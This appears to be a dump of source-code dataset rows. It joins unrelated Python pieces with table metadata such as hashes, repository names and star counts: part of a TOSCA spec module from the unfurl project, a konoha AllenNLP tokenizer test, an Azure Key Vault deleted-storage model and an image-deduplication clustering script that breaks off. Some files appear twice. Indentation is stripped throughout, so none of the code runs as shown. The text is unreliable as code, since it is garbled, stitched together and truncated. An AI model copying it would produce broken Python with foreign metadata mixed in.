dict(repository=repositoryName, file=file), spec=self
)
if baseArtifact.repository:
return baseArtifact.get_path()
else:
return None
def get_template(self, name):
if name == "~topology":
return self.topology
elif "~c~" in name:
nodeName, capability = name.split("~c~")
nodeTemplate = self.nodeTemplates.get(nodeName)
if not nodeTemplate:
return None
return nodeTemplate.get_capability(capability)
elif "~r~" in name:
nodeName, requirement = name.split("~r~")
if nodeName:
nodeTemplate = self.nodeTemplates.get(nodeName)
if not nodeTemplate:
return None
return nodeTemplate.get_relationship(requirement)
else:
return self.relationshipTemplates.get(name)
elif "~q~" in name:
nodeName, requirement = name.split("~q~")
nodeTemplate = self.nodeTemplates.get(nodeName)
if not nodeTemplate:
return None
return nodeTemplate.get_requirement(requirement)
elif "~a~" in name:
nodeTemplate = None
nodeName, artifactName = name.split("~a~")
if nodeName:
nodeTemplate = self.nodeTemplates.get(nodeName)
if not nodeTemplate:
return None
artifact = nodeTemplate.artifacts.get(artifactName)
if artifact:
return artifact
tpl = self._get_artifact_spec_from_name(artifactName)
return ArtifactSpec(tpl, nodeTemplate, spec=self)
else:
return self.nodeTemplates.get(name)
def _get_artifact_declared_tpl(self, repositoryName, file):
repository = self.nodeTemplates.get(repositoryName)
if repository:
artifact = repository.artifacts.get(file)
if artifact:
return artifact.toscaEntityTemplate.entity_tpl.copy()
return None
def _get_artifact_spec_from_name(self, name):
repository, sep, file = name.partition(":")
file = decode_unfurl_identifier(file)
artifact = self._get_artifact_declared_tpl(repository, file)
if artifact:
return artifact
spec = CommentedMap(file=file)
if repository:
spec["repository"] = repository
return spec
def is_type_name(self, typeName):
return (
typeName in self.template.topology_template.custom_defs
or typeName in EntityType.TOSCA_DEF
)
def find_matching_templates(self, typeName):
for template in self.nodeTemplates.values():
if template.is_compatible_type(typeName):
yield template
def load_instances(self, toscaDef, tpl):
node_templates = toscaDef["topology_template"]["node_templates"]
for name, impl in tpl.get("installers", {}).items():
if name not in node_templates:
node_templates[name] = dict(type=self.InstallerType, properties=impl)
else:
raise UnfurlValidationError(
f'can not add installer "{name}", there is already a node template with that name'
)
for name, impl in tpl.get("instances", {}).items():
if name not in node_templates and isinstance(impl, dict):
if "template" not in impl:
node_templates[name] = self.instance_to_template(impl.copy())
elif isinstance(impl["template"], dict):
node_templates[name] = impl["template"]
if "discovered" in tpl:
self.discovered = tpl["discovered"]
for name, impl in tpl["discovered"].items():
if name not in node_templates:
custom_types = impl.pop("custom_types", None)
node_templates[name] = impl
if custom_types:
toscaDef.setdefault("types", CommentedMap()).update(
custom_types
)
def instance_to_template(self, impl):
if "type" not in impl:
impl["type"] = "unfurl.nodes.Default"
installer = impl.pop("install", None)
if installer:
impl["requirements"] = [{"install": installer}]
return impl
def import_connections(self, importedSpec):
for template in importedSpec.template.relationship_templates:
if not template.default_for:
template.default_for = "ANY"
relTemplate = RelationshipSpec(template, self)
if template.name not in self.relationshipTemplates:
self.relationshipTemplates[template.name] = relTemplate
def find_props(attributes, propertyDefs, matchfn):
if not attributes:
return
for propdef in propertyDefs.values():
if propdef.name not in attributes:
continue
match = matchfn(propdef.entry_schema_entity or propdef.entity)
if not propdef.entry_schema and not propdef.entity.properties:
if match:
yield propdef.name, attributes[propdef.name]
continue
if not propdef.entry_schema:
# it's complex datatype
value = attributes[propdef.name]
if match:
yield propdef.name, value
elif value:
for name, v in find_props(value, propdef.entity.properties, matchfn):
yield name, v
continue
properties = propdef.entry_schema_entity.properties
if not match and not properties:
continue
value = attributes[propdef.name]
if not value:
continue
if propdef.type == "map":
for key, val in value.items():
if match:
yield key, val
elif properties:
for name, v in find_props(val, properties, matchfn):
yield name, v
elif propdef.type == "list":
for val in value:
if match:
yield None, val
elif properties:
for name, v in find_props(val, properties, matchfn):
yield name, v
# represents a node, capability or relationship
class EntitySpec(ResourceRef):
# XXX need to define __eq__ for spec changes
def __init__(self, toscaNodeTemplate, spec=None):
self.toscaEntityTemplate = toscaNodeTemplate
self.spec = spec
self.name = toscaNodeTemplate.name
if not validate_unfurl_identifier(self.name):
ExceptionCollector.appendException(
UnfurlValidationError(
f'"{self.name}" is not a valid TOSCA template name',
log=True,
)
)
self.type = toscaNodeTemplate.type
self._isReferencedBy = [] # this is referenced by another template or via property traversal
# nodes have both properties and attributes
# as do capability properties and relationships
# but only property values are declared
# XXX user should be able to declare default attribute values
self.propertyDefs = toscaNodeTemplate.get_properties()
self.attributeDefs = {}
# XXX test_helm.py fails without making a deepcopy
# some how chart_values is being modifying outside of a task transaction
self.properties = copy.deepcopy(
CommentedMap(
[(prop.name, prop.value) for prop in self.propertyDefs.values()]
)
)
if toscaNodeTemplate.type_definition:
# add attributes definitions
attrDefs = toscaNodeTemplate.type_definition.get_attributes_def()
self.defaultAttributes = {
prop.name: prop.default
for prop in attrDefs.values()
if prop.name not in ["tosca_id", "state", "tosca_name"]
}
for name, aDef in attrDefs.items():
prop = Property(
name, aDef.default, aDef.schema, toscaNodeTemplate.custom_def
)
self.propertyDefs[name] = prop
self.attributeDefs[name] = prop
# now add any property definitions that haven't been defined yet
props_def = toscaNodeTemplate.type_definition.get_properties_def()
for pDef in props_def.values():
if pDef.schema and pDef.name not in self.propertyDefs:
self.propertyDefs[pDef.name] = Property(
pDef.name,
pDef.default,
pDef.schema,
toscaNodeTemplate.custom_def,
)
else:
self.defaultAttributes = {}
def _resolve(self, key):
if key in ["name", "type", "uri", "groups", "policies"]:
return getattr(self, key)
raise KeyError(key)
def get_interfaces(self):
return self.toscaEntityTemplate.interfaces
def get_interface_requirements(self):
return self.toscaEntityTemplate.type_definition.get_interface_requirements(
self.toscaEntityTemplate.entity_tpl
)
@property
def groups(self):
if not self.spec:
return
for g in self.spec.groups.values():
if self.name in g.members:
yield g
@property
def policies(self):
return []
def is_compatible_target(self, targetStr):
if self.name == targetStr:
return True
return self.toscaEntityTemplate.is_derived_from(targetStr)
def is_compatible_type(self, typeStr):
return self.toscaEntityTemplate.is_derived_from(typeStr)
@property
def uri(self):
return self.get_uri()
def get_uri(self):
return self.name
def __repr__(self):
return f"{self.__class__.__name__}('{self.name}')"
@property
def artifacts(self):
return {}
@staticmethod
def get_name_from_artifact_spec(artifact_tpl):
name = artifact_tpl.get(
"name", encode_unfurl_identifier(artifact_tpl.get("file", ""))
)
repository_name = artifact_tpl.get("repository", "")
if repository_name:
return repository_name + "--" + name
else:
return name
def find_or_create_artifact(self, nameOrTpl, path=None, predefined=False):
if not nameOrTpl:
return None
if isinstance(nameOrTpl, six.string_types):
name = nameOrTpl
artifact = self.artifacts.get(nameOrTpl)
if artifact:
return artifact
repositoryName = ""
else:
# and only encode the file and repository in get_name_from_artifact_spec()
tpl = nameOrTpl
name = nameOrTpl["file"]
repositoryName = nameOrTpl.get("repository")
# if the artifact is defined in a repository, make a copy of it
if not repositoryName:
# see if artifact is declared in local repository
for localStore in self.spec.find_matching_templates(
"unfurl.nodes.LocalRepository"
):
artifact = localStore.artifacts.get(name)
if artifact:
# found, make a inline copy
tpl = artifact.toscaEntityTemplate.entity_tpl.copy()
tpl["name"] = name
tpl["repository"] = localStore.name
break
else:
if predefined and not check_class_registry(name):
logger.warning(f"no artifact named {name} found")
return None
# otherwise name not found, assume it's a file path or URL
tpl = dict(file=name)
else:
artifact_tpl = self.spec._get_artifact_declared_tpl(repositoryName, name)
if artifact_tpl:
tpl = artifact_tpl
tpl["repository"] = repositoryName
return ArtifactSpec(tpl, self, path=path)
@property
def abstract(self):
return None
@property
def directives(self):
return []
def find_props(self, attributes, matchfn):
for name, val in find_props(attributes, self.propertyDefs, matchfn):
yield name, val
@property
def base_dir(self):
if self.toscaEntityTemplate._source:
return self.toscaEntityTemplate._source
elif self.spec:
return self.spec.base_dir
else:
return None
def aggregate_only(self):
for iDef in self.get_interfaces():
if iDef.interfacename == "Standard":
return False
if iDef.interfacename == "Install" and iDef.name == "discover":
return False
return True
@property
def required(self):
for root in _get_roots(self):
if self.spec.substitution_template:
if self.spec.substitution_template is root:
return True
elif 'default' not in root.directives:
# if don't require if this only has defaults templates as a root
return True
return False
def _get_roots(node, seen=None):
if seen is None:
seen = set()
yield node
for parent in node._isReferencedBy:
if parent.name not in seen:
seen.add( node.name )
yield from _get_roots(parent, seen)
class NodeSpec(EntitySpec):
# has attributes: tosca_id, tosca_name, state, (3.4.1 Node States p.61)
def __init__(self, template=None, spec=None):
if not template:
template = next(
iter(create_default_topology().topology_template.nodetemplates)
)
spec = ToscaSpec(create_default_topology())
else:
assert spec
EntitySpec.__init__(self, template, spec)
self._capabilities = None
self._requirements = None
self._relationships = []
self._artifacts = None
def _resolve(self, key):
try:
return super()._resolve(key)
except KeyError:
req = self.get_requirement(key)
if not req:
raise KeyError(key)
relationship = req.relationship
# hack!
relationship.toscaEntityTemplate.entity_tpl = list(req.entity_tpl.values())[
0
]
return relationship
@property
def artifacts(self):
if self._artifacts is None:
self._artifacts = {
name: ArtifactSpec(artifact, self)
for name, artifact in self.toscaEntityTemplate.artifacts.items()
}
return self._artifacts
@property
def policies(self):
if not self.spec:
return
for p in self.spec.policies.values():
if p.toscaEntityTemplate.targets_type == "groups":
# the policy has groups as members, see if this node's groups is one of them
if p.members & {g.name for g in self.groups}:
yield p
elif p.toscaEntityTemplate.targets_type == "node_templates":
if self.name in p.members:
yield p
@property
def requirements(self):
if self._requirements is None:
self._requirements = {}
nodeTemplate = self.toscaEntityTemplate
for (relTpl, req, req_type_def) in nodeTemplate.relationships:
name, values = next(iter(req.items()))
reqSpec = RequirementSpec(name, req, self, req_type_def)
if relTpl.target:
nodeSpec = self.spec.get_template(relTpl.target.name)
if nodeSpec:
nodeSpec.add_relationship(reqSpec)
else:
msg = f'Missing target node "{relTpl.target.name}" for requirement "{name}" on "{self.name}"'
ExceptionCollector.appendException(UnfurlValidationError(msg))
self._requirements[name] = reqSpec
return self._requirements
def get_requirement(self, name):
return self.requirements.get(name)
def get_relationship(self, name):
req = self.requirements.get(name)
if not req:
return None
return req.relationship
@property
def relationships(self):
for r in self.toscaEntityTemplate.get_relationship_templates():
assert r.source
self.spec.get_template(r.source.name).requirements
return self._get_relationship_specs()
def _get_relationship_specs(self):
if len(self._relationships) != len(
self.toscaEntityTemplate.get_relationship_templates()
):
rIds = {id(r.toscaEntityTemplate) for r in self._relationships}
for r in self.toscaEntityTemplate.get_relationship_templates():
if id(r) not in rIds and r.capability:
self._relationships.append(RelationshipSpec(r, self.spec, self))
return self._relationships
def get_capability_interfaces(self):
idefs = [r.get_interfaces() for r in self._get_relationship_specs()]
return [i for elem in idefs for i in elem if i.name != "default"]
def get_requirement_interfaces(self):
idefs = [r.get_interfaces() for r in self.requirements.values()]
return [i for elem in idefs for i in elem if i.name != "default"]
@property
def capabilities(self):
if self._capabilities is None:
self._capabilities = {
c.name: CapabilitySpec(self, c)
for c in self.toscaEntityTemplate.get_capabilities_objects()
}
return self._capabilities
def get_capability(self, name):
return self.capabilities.get(name)
def add_relationship(self, reqSpec):
for relSpec in self._get_relationship_specs():
# to fix this have the RelationshipTemplate remember the name of the requirement
if (
relSpec.toscaEntityTemplate.source.name
== reqSpec.parentNode.toscaEntityTemplate.name
):
assert not reqSpec.relationship or reqSpec.relationship is relSpec, (reqSpec.relationship, relSpec)
reqSpec.relationship = relSpec
assert not relSpec.requirement or relSpec.requirement is reqSpec, (relSpec.requirement, reqSpec)
if not relSpec.requirement:
relSpec.requirement = reqSpec
break
else:
msg = f'relationship not found for requirement "{reqSpec.name}" on "{reqSpec.parentNode}" targeting "{self.name}"'
ExceptionCollector.appendException(UnfurlValidationError(msg))
@property
def abstract(self):
for name in ("select", "substitute"):
if name in self.toscaEntityTemplate.directives:
return name
return None
@property
def directives(self):
return self.toscaEntityTemplate.directives
class RelationshipSpec(EntitySpec):
def __init__(self, template=None, spec=None, targetNode=None):
# template is a RelationshipTemplate
# It is a full-fledged entity with a name, type, properties, attributes, interfaces, and metadata.
# its connected through target, source, capability
# its RelationshipType has valid_target_types
if not template:
template = (
create_default_topology().topology_template.relationship_templates[0]
)
spec = ToscaSpec(create_default_topology())
else:
assert spec
EntitySpec.__init__(self, template, spec)
self.requirement = None
self.capability = None
if targetNode:
assert targetNode.toscaEntityTemplate is template.target
for c in targetNode.capabilities.values():
if c.toscaEntityTemplate is template.capability:
self.capability = c
break
else:
raise UnfurlError(
"capability %s not found in %s for %s"
% (
template.capability.name,
[c.name for c in targetNode.capabilities.values()],
targetNode.name,
)
)
@property
def source(self):
return self.requirement.parentNode if self.requirement else None
@property
def target(self):
return self.capability.parentNode if self.capability else None
def _resolve(self, key):
try:
return super()._resolve(key)
except KeyError:
if self.capability:
if self.capability.parentNode.is_compatible_target(key):
return self.capability.parentNode
if self.capability.is_compatible_target(key):
return self.capability
raise KeyError(key)
def get_uri(self):
suffix = "~r~" + self.name
return self.source.name + suffix if self.source else suffix
def matches_target(self, capability):
defaultFor = self.toscaEntityTemplate.default_for
if not defaultFor:
return False
nodeTemplate = capability.parentNode.toscaEntityTemplate
if (
defaultFor == self.toscaEntityTemplate.ANY
or defaultFor == nodeTemplate.name
or nodeTemplate.is_derived_from(defaultFor)
or defaultFor == capability.name
or capability.is_derived_from(defaultFor)
):
return self.toscaEntityTemplate.get_matching_capabilities(
nodeTemplate, capability.name
)
return False
class RequirementSpec:
# XXX need __eq__ since this doesn't derive from EntitySpec
def __init__(self, name, req, parent, type_tpl):
self.source = self.parentNode = parent
self.spec = parent.spec
self.name = name
self.entity_tpl = req
self.relationship = None
self.type_tpl = type_tpl
def __repr__(self):
return f"{self.__class__.__name__}('{self.name}')"
@property
def artifacts(self):
return self.parentNode.artifacts
def get_uri(self):
return self.parentNode.name + "~q~" + self.name
def get_interfaces(self):
return self.relationship.get_interfaces() if self.relationship else []
def get_nodefilter_properties(self):
return get_nodefilters(self.type_tpl, 'properties')
def get_nodefilter_requirements(self):
return get_nodefilters(self.type_tpl, "requirements")
def get_nodefilters(entity_tpl, key):
if not isinstance(entity_tpl, dict):
return
nodefilter = entity_tpl.get('node_filter')
if nodefilter and key in nodefilter:
for filter in nodefilter[key]:
name, value = next(iter(filter.items()))
yield name, value
class CapabilitySpec(EntitySpec):
def __init__(self, parent=None, capability=None):
if not parent:
parent = NodeSpec()
capability = parent.toscaEntityTemplate.get_capabilities_objects()[0]
self.parentNode = parent
assert capability
EntitySpec.__init__(self, capability, parent.spec)
self._relationships = None
self._defaultRelationships = None
@property
def parent(self):
return self.parentNode
@property
def artifacts(self):
return self.parentNode.artifacts
def get_interfaces(self):
# capabilities don't have their own interfaces
return self.parentNode.get_interfaces()
def get_uri(self):
# this is demanagled by getTemplate()
return self.parentNode.name + "~c~" + self.name
@property
def relationships(self):
return [r for r in self.parentNode.relationships if r.capability is self]
@property
def default_relationships(self):
if self._defaultRelationships is None:
self._defaultRelationships = [
relSpec
for relSpec in self.spec.relationshipTemplates.values()
if relSpec.matches_target(self)
]
return self._defaultRelationships
def get_default_relationships(self, relation=None):
if not relation:
return self.default_relationships
return [
relSpec
for relSpec in self.default_relationships
if relSpec.is_compatible_type(relation)
]
class TopologySpec(EntitySpec):
# has attributes: tosca_id, tosca_name, state, (3.4.1 Node States p.61)
def __init__(self, spec=None, inputs=None):
if spec:
self.spec = spec
template = spec.template.topology_template
else:
template = create_default_topology().topology_template
self.spec = ToscaSpec(create_default_topology())
self.spec.topology = self
inputs = inputs or {}
self.toscaEntityTemplate = template
self.name = "~topology"
self.type = "~topology"
self.inputs = {
input.name: inputs.get(input.name, input.default)
for input in template.inputs
}
self.outputs = {output.name: output.value for output in template.outputs}
self.properties = CommentedMap() # XXX implement substitution_mappings
self.defaultAttributes = {}
self.propertyDefs = {}
self.attributeDefs = {}
self.capabilities = []
self._defaultRelationships = None
self._isReferencedBy = []
def get_interfaces(self):
# doesn't have any interfaces
return []
def is_compatible_target(self, targetStr):
if self.name == targetStr:
return True
return False
def is_compatible_type(self, typeStr):
return False
@property
def primary_provider(self):
return self.spec.relationshipTemplates.get("primary_provider")
@property
def default_relationships(self):
if self._defaultRelationships is None:
self._defaultRelationships = [
relSpec
for relSpec in self.spec.relationshipTemplates.values()
if relSpec.toscaEntityTemplate.default_for
]
return self._defaultRelationships
@property
def base_dir(self):
return self.spec.base_dir
def _resolve(self, key):
try:
return super()._resolve(key)
except KeyError:
nodeTemplates = self.spec.nodeTemplates
nodeSpec = nodeTemplates.get(key)
if nodeSpec:
return nodeSpec
matches = [n for n in nodeTemplates.values() if n.is_compatible_type(key)]
if not matches:
raise KeyError(key)
return matches
class Workflow:
def __init__(self, workflow):
self.workflow = workflow
def __str__(self):
return f"Workflow({self.workflow.name})"
def initial_steps(self):
preceeding = set()
for step in self.workflow.steps.values():
preceeding.update(step.on_success + step.on_failure)
return [
step for step in self.workflow.steps.values() if step.name not in preceeding
]
def get_step(self, stepName):
return self.workflow.steps.get(stepName)
def match_step_filter(self, stepName, resource):
step = self.get_step(stepName)
if step:
return all(filter.evaluate(resource.attributes) for filter in step.filter)
return None
def match_preconditions(self, resource):
for precondition in self.workflow.preconditions:
target = resource.root.find_resource(precondition.target)
if not target:
return False
if not all(
filter.evaluate(target.attributes) for filter in precondition.condition
):
return False
return True
class ArtifactSpec(EntitySpec):
buildin_fields = (
"file",
"repository",
"deploy_path",
"version",
"checksum",
"checksum_algorithm",
"mime_type",
"file_extensions",
)
def __init__(self, artifact_tpl, template=None, spec=None, path=None):
self.parentNode = template
spec = template.spec if template else spec
if isinstance(artifact_tpl, toscaparser.artifacts.Artifact):
artifact = artifact_tpl
else:
name = self.get_name_from_artifact_spec(artifact_tpl)
artifact_tpl.pop("name", None)
custom_defs = spec and spec.template.topology_template.custom_defs or {}
artifact = toscaparser.artifacts.Artifact(
name, artifact_tpl, custom_defs, path
)
EntitySpec.__init__(self, artifact, spec)
self.repository = (
spec
and artifact.repository
and spec.template.repositories.get(artifact.repository)
or None
)
# map artifacts fields into properties
for prop in self.buildin_fields:
self.defaultAttributes[prop] = getattr(artifact, prop)
def get_uri(self):
if self.parentNode:
return self.parentNode.name + "~a~" + self.name
else:
return "~a~" + self.name
@property
def file(self):
return self.toscaEntityTemplate.file
@property
def base_dir(self):
if self.toscaEntityTemplate._source:
return get_base_dir(self.toscaEntityTemplate._source)
else:
return super().base_dir
def get_path(self, resolver=None):
return self.get_path_and_fragment(resolver)[0]
def get_path_and_fragment(self, resolver=None, tpl=None):
tpl = self.spec and self.spec.template.tpl or tpl
if not resolver and self.spec:
resolver = self.spec.template.import_resolver
loader = toscaparser.imports.ImportsLoader(
None, self.base_dir, tpl=tpl, resolver=resolver
)
path, isFile, fragment = loader._resolve_import_template(
None, self.as_import_spec()
)
return path, fragment
def as_import_spec(self):
return dict(file=self.file, repository=self.toscaEntityTemplate.repository)
class GroupSpec(EntitySpec):
def __init__(self, template, spec):
EntitySpec.__init__(self, template, spec)
self.members = template.members
# XXX getNodeTemplates() getInstances(), getChildren()
@property
def member_groups(self):
return [self.spec.groups[m] for m in self.members if m in self.spec.groups]
@property
def policies(self):
if not self.spec:
return
for p in self.spec.policies.values():
if p.toscaEntityTemplate.targets_type == "groups":
if self.name in p.members:
yield p
class PolicySpec(EntitySpec):
def __init__(self, template, spec):
EntitySpec.__init__(self, template, spec)
self.members = set(template.targets_list)
| true | true |
f7fa563f7239b2037be8bcca3b3bcd0f687e6435 | 1,388 | py | Python | tests/integrations/test_allennlp_integration.py | altescy/konoha | 3870227f7a23913affa429aeea2613b0f6c68d8b | [
"MIT"
] | 149 | 2020-01-23T18:33:06.000Z | 2022-03-27T16:27:44.000Z | tests/integrations/test_allennlp_integration.py | altescy/konoha | 3870227f7a23913affa429aeea2613b0f6c68d8b | [
"MIT"
] | 32 | 2020-01-14T18:03:10.000Z | 2021-12-18T22:42:51.000Z | tests/integrations/test_allennlp_integration.py | altescy/konoha | 3870227f7a23913affa429aeea2613b0f6c68d8b | [
"MIT"
] | 16 | 2020-01-15T08:55:23.000Z | 2021-12-17T18:11:46.000Z | import tempfile
from typing import List, Optional
import allennlp.commands.train
from allennlp.models.basic_classifier import BasicClassifier
import pytest
from konoha.integrations.allennlp import KonohaTokenizer
@pytest.fixture
def raw_text():
return "吾輩は猫である"
@pytest.mark.parametrize(
"token_surfaces,tokenizer_name,mode,model_path", (
("吾輩 は 猫 で ある".split(" "), "mecab", None, None),
("吾輩 は 猫 で ある".split(" "), "janome", None, None),
("吾輩 は 猫 で あ る".split(" "), "kytea", None, None),
("▁ 吾 輩 は 猫 である".split(" "), "sentencepiece", None, "data/model.spm"),
("吾輩 は 猫 で ある".split(" "), "sudachi", "A", None),
)
)
def test_allennlp(
raw_text: str,
token_surfaces: List[str],
tokenizer_name: str,
mode: Optional[str],
model_path: Optional[str],
) -> None:
tokenizer = KonohaTokenizer(
tokenizer_name=tokenizer_name,
mode=mode,
model_path=model_path,
)
tokens_konoha = tokenizer.tokenize(raw_text)
assert token_surfaces == list(t.text for t in tokens_konoha)
def test_allennlp_training():
with tempfile.TemporaryDirectory() as serialization_dir:
model = allennlp.commands.train.train_model_from_file(
"test_fixtures/classifier.jsonnet",
serialization_dir=serialization_dir,
)
assert isinstance(model, BasicClassifier)
| 28.326531 | 78 | 0.662824 | import tempfile
from typing import List, Optional
import allennlp.commands.train
from allennlp.models.basic_classifier import BasicClassifier
import pytest
from konoha.integrations.allennlp import KonohaTokenizer
@pytest.fixture
def raw_text():
return "吾輩は猫である"
@pytest.mark.parametrize(
"token_surfaces,tokenizer_name,mode,model_path", (
("吾輩 は 猫 で ある".split(" "), "mecab", None, None),
("吾輩 は 猫 で ある".split(" "), "janome", None, None),
("吾輩 は 猫 で あ る".split(" "), "kytea", None, None),
("▁ 吾 輩 は 猫 である".split(" "), "sentencepiece", None, "data/model.spm"),
("吾輩 は 猫 で ある".split(" "), "sudachi", "A", None),
)
)
def test_allennlp(
raw_text: str,
token_surfaces: List[str],
tokenizer_name: str,
mode: Optional[str],
model_path: Optional[str],
) -> None:
tokenizer = KonohaTokenizer(
tokenizer_name=tokenizer_name,
mode=mode,
model_path=model_path,
)
tokens_konoha = tokenizer.tokenize(raw_text)
assert token_surfaces == list(t.text for t in tokens_konoha)
def test_allennlp_training():
with tempfile.TemporaryDirectory() as serialization_dir:
model = allennlp.commands.train.train_model_from_file(
"test_fixtures/classifier.jsonnet",
serialization_dir=serialization_dir,
)
assert isinstance(model, BasicClassifier)
| true | true |
f7fa56459f92fef474ac7580e88247786ba3d0e8 | 3,363 | py | Python | sdk/keyvault/azure-keyvault/azure/keyvault/v7_3_preview/models/deleted_storage_bundle_py3.py | mccoyp/azure-keyvault-7.3-preview | da351753a9d3d2bf97c27566865cd88bae7faa55 | [
"MIT"
] | null | null | null | sdk/keyvault/azure-keyvault/azure/keyvault/v7_3_preview/models/deleted_storage_bundle_py3.py | mccoyp/azure-keyvault-7.3-preview | da351753a9d3d2bf97c27566865cd88bae7faa55 | [
"MIT"
] | null | null | null | sdk/keyvault/azure-keyvault/azure/keyvault/v7_3_preview/models/deleted_storage_bundle_py3.py | mccoyp/azure-keyvault-7.3-preview | da351753a9d3d2bf97c27566865cd88bae7faa55 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .storage_bundle_py3 import StorageBundle
class DeletedStorageBundle(StorageBundle):
"""A deleted storage account bundle consisting of its previous id, attributes
and its tags, as well as information on when it will be purged.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: The storage account id.
:vartype id: str
:ivar resource_id: The storage account resource id.
:vartype resource_id: str
:ivar active_key_name: The current active storage account key name.
:vartype active_key_name: str
:ivar auto_regenerate_key: whether keyvault should manage the storage
account for the user.
:vartype auto_regenerate_key: bool
:ivar regeneration_period: The key regeneration time duration specified in
ISO-8601 format.
:vartype regeneration_period: str
:ivar attributes: The storage account attributes.
:vartype attributes: ~storage.models.StorageAccountAttributes
:ivar tags: Application specific metadata in the form of key-value pairs
:vartype tags: dict[str, str]
:param recovery_id: The url of the recovery object, used to identify and
recover the deleted storage account.
:type recovery_id: str
:ivar scheduled_purge_date: The time when the storage account is scheduled
to be purged, in UTC
:vartype scheduled_purge_date: datetime
:ivar deleted_date: The time when the storage account was deleted, in UTC
:vartype deleted_date: datetime
"""
_validation = {
'id': {'readonly': True},
'resource_id': {'readonly': True},
'active_key_name': {'readonly': True},
'auto_regenerate_key': {'readonly': True},
'regeneration_period': {'readonly': True},
'attributes': {'readonly': True},
'tags': {'readonly': True},
'scheduled_purge_date': {'readonly': True},
'deleted_date': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'active_key_name': {'key': 'activeKeyName', 'type': 'str'},
'auto_regenerate_key': {'key': 'autoRegenerateKey', 'type': 'bool'},
'regeneration_period': {'key': 'regenerationPeriod', 'type': 'str'},
'attributes': {'key': 'attributes', 'type': 'StorageAccountAttributes'},
'tags': {'key': 'tags', 'type': '{str}'},
'recovery_id': {'key': 'recoveryId', 'type': 'str'},
'scheduled_purge_date': {'key': 'scheduledPurgeDate', 'type': 'unix-time'},
'deleted_date': {'key': 'deletedDate', 'type': 'unix-time'},
}
def __init__(self, *, recovery_id: str=None, **kwargs) -> None:
super(DeletedStorageBundle, self).__init__(**kwargs)
self.recovery_id = recovery_id
self.scheduled_purge_date = None
self.deleted_date = None
| 43.115385 | 83 | 0.641094 |
from .storage_bundle_py3 import StorageBundle
class DeletedStorageBundle(StorageBundle):
_validation = {
'id': {'readonly': True},
'resource_id': {'readonly': True},
'active_key_name': {'readonly': True},
'auto_regenerate_key': {'readonly': True},
'regeneration_period': {'readonly': True},
'attributes': {'readonly': True},
'tags': {'readonly': True},
'scheduled_purge_date': {'readonly': True},
'deleted_date': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'active_key_name': {'key': 'activeKeyName', 'type': 'str'},
'auto_regenerate_key': {'key': 'autoRegenerateKey', 'type': 'bool'},
'regeneration_period': {'key': 'regenerationPeriod', 'type': 'str'},
'attributes': {'key': 'attributes', 'type': 'StorageAccountAttributes'},
'tags': {'key': 'tags', 'type': '{str}'},
'recovery_id': {'key': 'recoveryId', 'type': 'str'},
'scheduled_purge_date': {'key': 'scheduledPurgeDate', 'type': 'unix-time'},
'deleted_date': {'key': 'deletedDate', 'type': 'unix-time'},
}
def __init__(self, *, recovery_id: str=None, **kwargs) -> None:
super(DeletedStorageBundle, self).__init__(**kwargs)
self.recovery_id = recovery_id
self.scheduled_purge_date = None
self.deleted_date = None
| true | true |
f7fa56e1a0d8e96cef92233154f85df4df1ee54e | 3,875 | py | Python | run_phash.py | levan92/imagededup | f89eb2377712470da868cbe7e5bbf7dfd77af124 | [
"Apache-2.0"
] | 1 | 2020-07-15T01:01:25.000Z | 2020-07-15T01:01:25.000Z | run_phash.py | levan92/imagededup | f89eb2377712470da868cbe7e5bbf7dfd77af124 | [
"Apache-2.0"
] | null | null | null | run_phash.py | levan92/imagededup | f89eb2377712470da868cbe7e5bbf7dfd77af124 | [
"Apache-2.0"
] | 1 | 2021-03-08T05:05:30.000Z | 2021-03-08T05:05:30.000Z | import time
import argparse
from pathlib import Path
from shutil import copy
from clustering import clustering
from imagededup.methods import PHash
# IMG_EXTS = ['.png', '.jpg', '.jpeg', '.tiff', '.bmp']
# IMG_EXTS = [ e.lower() for e in IMG_EXTS]
# IMG_EXTS.extend( [ e.upper() for e in IMG_EXTS ])
parser = argparse.ArgumentParser()
parser.add_argument('directory', help='Path to root directory of images')
parser.add_argument('--thresh', help='distance threshold (hamming distance) int between 0 and 64. Default: 10', default=10, type=int)
parser.add_argument('--get-clusters', help='if flagged, will copy images over to <input name>_Dups_thresh{thresh} output folder in their computed clusters subdirectories', action='store_true')
parser.add_argument('--dedup', help='if flagged, will copy images over to <input name>_deduped with images randomly sampled', action='store_true')
parser.add_argument('--cluster-num', help='max num of samples from each cluster (if dedup is flagged).', type=int)
cache_group = parser.add_mutually_exclusive_group()
cache_group.add_argument('--save', help='save encoding map (phash of images) as pkl', action='store_true')
cache_group.add_argument('--load', help='load encoding map (phash of images) from pkl', type=str)
args = parser.parse_args()
dist_thresh = int(args.thresh)
assert 0 <= dist_thresh <=64
root_dir = Path(args.directory)
assert root_dir.is_dir()
out_dir = root_dir.parent / 'Dups_thresh{}'.format(dist_thresh)
phasher = PHash()
if args.load is not None and Path(args.load).is_file():
import pickle
encoding_map = pickle.load(open(args.load, 'rb'))
print(f'Encoding map loaded from pickle file: {args.load}!')
else:
tic = time.perf_counter()
encoding_map = phasher.encode_images(image_dir=root_dir, rglob=True)
toc = time.perf_counter()
print(f'encoding duration: {toc-tic:.3f}s')
if args.save:
import pickle
pickle_file = f"{root_dir.stem}_encoding_map.pkl"
pickle.dump(encoding_map, open(pickle_file,"wb"))
print(f'Encoding map dumped as pickle at: {pickle_file}')
tic = time.perf_counter()
distance_map = phasher.find_duplicates(encoding_map=encoding_map, max_distance_threshold=dist_thresh, scores=True)
toc = time.perf_counter()
print(f'find dups duration: {toc-tic:.3f}s')
tic = time.perf_counter()
clusters = clustering(distance_map)
toc = time.perf_counter()
print(f'clustering duration: {toc-tic:.4f}s')
print('Original number of images:', len(encoding_map))
print('Num of clusters:', len(clusters))
cluster_counts = [ len(x) for x in clusters ]
print('Clusters size distribution:', cluster_counts)
if args.get_clusters:
clusters_out_dir = root_dir.parent / '{}_Dups_thresh{}'.format(root_dir.stem, dist_thresh)
print('Generating clusters at ', clusters_out_dir)
